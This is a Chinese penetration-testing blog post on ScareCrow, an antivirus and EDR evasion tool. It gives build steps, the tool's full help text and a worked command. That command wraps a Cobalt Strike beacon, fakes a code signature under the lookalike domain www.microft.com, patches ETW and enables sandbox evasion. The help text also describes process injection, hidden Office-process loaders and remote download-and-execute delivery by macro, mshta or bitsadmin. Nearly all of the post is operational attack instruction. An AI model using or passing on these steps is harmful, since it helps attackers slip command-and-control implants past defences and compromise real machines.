【渗透测试笔记】之【免杀工具——ScareCrow】

最新推荐文章于 2025-05-11 10:00:00 发布

原创最新推荐文章于 2025-05-11 10:00:00 发布

· 1.2k 阅读

2 ·

版权

文章标签：

#渗透测试

免杀专栏收录该内容

5 篇文章

订阅专栏

项目地址

https://github.com/optiv/ScareCrow

安装方法

首先安装：golang、openssl、osslsigncode、mingw-w64

apt install golang openssl osslsigncode mingw-w64 -y

下载源码：https://github.com/optiv/ScareCrow/tags
进入根目录编译

go env -w GOPROXY=https://goproxy.cn
# 使用国内原
go build ScareCrow.go
# 编译

查看帮助

./ScareCrow -h

 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
	\/     \/     \/            \/        \/                      
							(@Tyl0us)
	“Fear, you must understand is more than a mere obstacle. 
	Fear is a TEACHER. the first one you ever had.”
	
Usage of ./ScareCrow:
  -I string
    	Path to the raw 64-bit shellcode.
  -Loader string
    	Sets the type of process that will sideload the malicious payload:
    	[*] binary - Generates a binary based payload. (This type does not benfit from any sideloading)	
    	[*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
    	[*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
    	[*] excel - Loads into a hidden Excel process using a JScript loader.
    	[*] msiexec - Loads into MSIexec process using a JScript loader.
    	[*] wscript - Loads into WScript process using a JScript loader.
    	 (default "binary")
  -O string
    	Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
  -configfile string
    	The path to a json based configuration file to generate custom file attributes. This will not use the the default ones.
  -console
    	Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
  -delivery string
    	Generates a one-liner command to download and execute the payload remotely:
    	[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders).
    	[*] hta - Generates a blank hta file containing the loader along with a MSHTA command execute the loader remotely in the background (Compatible with Control and Excel Loaders). 
    	[*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)
  -domain string
    	The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) 
  -etw
    	Enables ETW patching to prevent ETW events from being generated
  -injection string
    	Enables Process Injection Mode and specify the path to the process to create/inject into (use \ for the path).
  -password string
    	The password for code signing cert. Required when -valid is used.
  -sandbox
    	Enables sandbox evasion using IsDomainedJoined calls.
  -unmodified
    	When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)
  -url string
    	URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)
  -valid string
    	The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.

基本用法

使用cs生成64位raw类型payload：
在这里插入图片描述

生成命令：

./ScareCrow -I beacon.bin -domain www.microft.com -etw -sandbox
# -I：指定raw文件
# -domain：伪造签名域名
# -etw：防止ETW事件生成
# -sandbox：反沙箱

上线测试：
在这里插入图片描述